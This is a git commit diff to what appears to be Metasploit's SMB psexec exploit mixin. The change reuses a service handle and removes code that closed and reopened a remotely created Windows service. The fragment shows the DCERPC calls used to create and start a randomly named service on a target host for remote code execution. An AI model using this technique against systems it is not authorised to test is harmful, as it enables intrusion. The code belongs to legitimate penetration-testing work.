Re-use CreateService Handle

and remove unused variable
bug/bundler_fix
Meatballs 2014-03-06 21:37:49 +00:00
parent 5606958320
commit 311d4665ce
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
1 changed files with 2 additions and 18 deletions

View File

@ -72,7 +72,6 @@ module Exploit::Remote::SMB::Psexec
end end
servicename = Rex::Text.rand_text_alpha(11) servicename = Rex::Text.rand_text_alpha(11)
displayname = Rex::Text.rand_text_alpha(16) displayname = Rex::Text.rand_text_alpha(16)
holdhandle = scm_handle
svc_handle = nil svc_handle = nil
svc_status = nil svc_status = nil
stubdata = stubdata =
@ -93,29 +92,14 @@ module Exploit::Remote::SMB::Psexec
vprint_status("#{peer} - Creating the service...") vprint_status("#{peer} - Creating the service...")
response = dcerpc.call(0x0c, stubdata) response = dcerpc.call(0x0c, stubdata)
if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil
svc_handle = dcerpc.last_response.stub_data[0,20] svc_handle = dcerpc.last_response.stub_data[4,20]
svc_status = dcerpc.last_response.stub_data[24,4] svc_status = dcerpc.last_response.stub_data[24,4]
end end
rescue ::Exception => e rescue ::Exception => e
print_error("#{peer} - Error creating service: #{e}") print_error("#{peer} - Error creating service: #{e}")
return false return false
end end
vprint_status("#{peer} - Closing service handle...")
begin
response = dcerpc.call(0x0, svc_handle)
rescue ::Exception
end
vprint_status("#{peer} - Opening service...")
begin
stubdata = scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF)
response = dcerpc.call(0x10, stubdata)
if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil
svc_handle = dcerpc.last_response.stub_data[0,20]
end
rescue ::Exception => e
print_error("#{peer} - Error opening service: #{e}")
return false
end
vprint_status("#{peer} - Starting the service...") vprint_status("#{peer} - Starting the service...")
stubdata = svc_handle + NDR.long(0) + NDR.long(0) stubdata = svc_handle + NDR.long(0) + NDR.long(0)
begin begin